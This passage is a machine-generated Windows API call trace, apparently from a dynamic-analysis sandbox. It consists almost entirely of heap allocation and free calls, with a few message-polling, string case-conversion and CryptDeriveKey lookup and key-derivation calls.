(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69bb0 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0087.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.059] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.060] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.060] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.060] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aa9c70 [0087.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9c70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.061] GetProcAddress (hModule=0x76390000, lpProcName="CryptDeriveKey") returned 0x763c2c90 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0087.061] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3b40, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3b80) returned 1 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0087.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa060 [0087.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0087.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa060 | out: hHeap=0x2af0000) returned 1 [0087.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0087.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0087.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0087.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69bb0 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.064] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 